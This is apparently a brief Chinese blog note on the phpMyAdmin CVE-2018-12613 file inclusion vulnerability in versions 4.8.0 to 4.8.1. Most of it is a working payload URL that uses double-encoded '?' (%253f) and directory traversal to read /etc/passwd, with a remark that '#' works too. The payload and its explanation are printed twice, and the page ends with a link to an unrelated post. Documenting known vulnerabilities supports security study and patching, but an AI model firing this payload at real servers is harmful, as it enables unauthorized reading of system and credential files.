phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
这里的解析会将?二次编码当成目录 不止? #也可以实现这个效果
2024-02-26 09:23:10
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
这里的解析会将?二次编码当成目录 不止? #也可以实现这个效果
下一篇:Android TV 遥控器适配